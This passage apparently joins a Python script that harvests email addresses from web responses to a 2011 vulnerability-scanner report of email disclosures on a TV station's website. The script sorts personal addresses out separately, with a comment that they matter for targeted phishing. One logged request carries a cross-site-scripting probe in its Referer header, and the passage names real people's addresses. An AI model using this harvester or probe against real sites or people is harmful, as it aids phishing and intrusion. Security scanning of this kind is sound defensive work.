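    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>\n"
    '<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>\n'
    '<div id="articleTagline" style="display:none">-sbulpett@bostonherald.com</div>\n'
    '<input type="hidden" name="business" value="backcopy@bostonherald.com">\n'
    '<input type="hidden" name="business" value="backcopy@bostonherald.com">\n'
    '<p>Contact news&#64;cbs6albany.com or jgretzinger@wrgb.com</p>\n'
    '<img src="/img/logo@2x.png">\n'
    "</body></html>\n"
)

# First character must be alphanumeric so a leading "-" (as in the hidden
# tagline) is not swallowed into the local part.
EMAIL_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Asset names such as logo@2x.png match the regex but are not addresses.
ASSET_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".css", ".js")

# Assumed list of generic mailboxes; personal addresses are the ones that
# matter for targeted phishing, so they are reported separately.
ROLE_LOCALPARTS = {"news", "newstips", "info", "support", "admin", "webmaster",
                   "sales", "backcopy", "noreply", "no-reply"}


def split_response(raw: str) -> Tuple[str, str]:
    """Split a raw HTTP response into (headers, body) at the first blank line."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition("\n\n")
    return head, body


def classify_context(text: str, start: int) -> str:
    """Name the markup an address sat in, judged from the text just before it."""
    before = text[max(0, start - 160):start]
    if before.endswith("mailto:"):
        return "mailto-href"
    if re.search(r'<input[^>]*type="hidden"[^>]*value="$', before):
        return "hidden-input"
    if re.search(r"display:\s*none[^>]*>[^<]*$", before):
        return "hidden-element"
    return "visible-text"


def scan_response(raw: str, host: str) -> List[dict]:
    """Return one record per distinct address found in the response body."""
    _, body = split_response(raw)
    text = unescape(body)  # decode &#64; and friends before matching
    site = host.lower().split(":")[0]
    if site.startswith("www."):
        site = site[4:]
    found: Dict[str, dict] = {}
    for m in EMAIL_RE.finditer(text):
        addr = m.group(0).lower()
        local, _, domain = addr.partition("@")
        if domain.endswith(ASSET_EXT):
            continue
        rec = found.setdefault(addr, {
            "address": addr,
            "count": 0,
            "contexts": [],
            "role_account": local in ROLE_LOCALPARTS,
            "off_site": not (domain == site or domain.endswith("." + site)),
        })
        rec["count"] += 1
        ctx = classify_context(text, m.start())
        if ctx not in rec["contexts"]:
            rec["contexts"].append(ctx)
    return sorted(found.values(), key=lambda r: r["address"])


if __name__ == "__main__":
    for rec in scan_response(SAMPLE_RESPONSE, "www.bostonherald.com"):
        kind = "role" if rec["role_account"] else "personal"
        where = "off-site" if rec["off_site"] else "on-site"
        print(f'{rec["address"]:32} x{rec["count"]} {kind:8} {where:8} {",".join(rec["contexts"])}')
```

Run as a script it prints one line per address; run over many crawled responses, the "hidden-input" and "hidden-element" contexts are worth a closer look, because an address the page author chose not to render is usually one they did not mean to publish.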

21.91. http://www.cbs6albany.com/albany-community/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-community/

Issue detail

The following email address was disclosed in the response:

Request

GET /albany-community/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.92. http://www.cbs6albany.com/albany-tv-programming/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-tv-programming/

Issue detail

The following email address was disclosed in the response:

Request

GET /albany-tv-programming/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:18 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.93. http://www.cbs6albany.com/albany-weather-forecast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-weather-forecast

Issue detail

The following email address was disclosed in the response:

Request

GET /albany-weather-forecast HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:35 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:35 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55367


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.94. http://www.cbs6albany.com/common/archives/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The following email address was disclosed in the response:

Request

GET /common/archives/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:41 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:41 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 33561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.95. http://www.cbs6albany.com/common/tools/load.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The following email address was disclosed in the response:

Request

GET /common/tools/load.php?js=common_prototype1_5_1,common_prototype1_5_1_effects,common_glider HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1298828234584%26vn%3D1; s_lastvisit=1296236234801; s_vnum_w=1296367200803%26vn%3D1; s_vnum_m=1296540000804%26vn%3D1; __qca=P0-387650238-1296236241942; s_nr=1296236252424; ebPanelFrequency_.www.cbs6albany.com=4189023%3A2%3A1%3A1296322656115; ebNewBandWidth_.www.cbs6albany.com=2030%3A1296236256165

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:38:14 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 15:40:53 GMT
ETag: "21d41b32472578a8cb78d13b2b0a036a-135983"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 13:38:14 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 135983

/* http://www.cbs6albany.com/common/tools/load.php?js=common_prototype1_5_1,common_prototype1_5_1_effects,common_glider */
/* Prototype JavaScript framework, version 1.5.1
* (c) 2005-2007 Sam Steph
...[SNIP]...
<bruno@missingmethod.com>
...[SNIP]...

21.96. http://www.cbs6albany.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /search/

Issue detail

The following email address was disclosed in the response:

Request

GET /search/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 47273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.97. http://www.cbs6albany.com/sections/abouthdtv/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/abouthdtv/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/abouthdtv/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:51 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:51 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.98. http://www.cbs6albany.com/sections/articles-map/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/articles-map/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/articles-map/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 22945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:og="
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.99. http://www.cbs6albany.com/sections/contactus/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/contactus/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/contactus/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:22:31 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:32:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.100. http://www.cbs6albany.com/sections/contactus/newstips/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/contactus/newstips/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/contactus/newstips/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:02 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.101. http://www.cbs6albany.com/sections/employmentopportunities/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/employmentopportunities/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/employmentopportunities/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.102. http://www.cbs6albany.com/sections/jobsonline/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/jobsonline/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/jobsonline/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:38 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.103. http://www.cbs6albany.com/sections/live-cameras/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/live-cameras/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/live-cameras/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:58 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:58 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.104. http://www.cbs6albany.com/sections/local-news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/local-news/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/local-news/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:46 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 87750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.105. http://www.cbs6albany.com/sections/local-sports/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/local-sports/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/local-sports/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:04 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 74279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.106. http://www.cbs6albany.com/sections/production-department/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/production-department/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sections/production-department/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:24:46 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:34:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:bbrandt@wrgb.com">bbrandt@wrgb.com </a>
...[SNIP]...

21.107. http://www.cbs6albany.com/sections/publicfile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/publicfile/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/publicfile/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
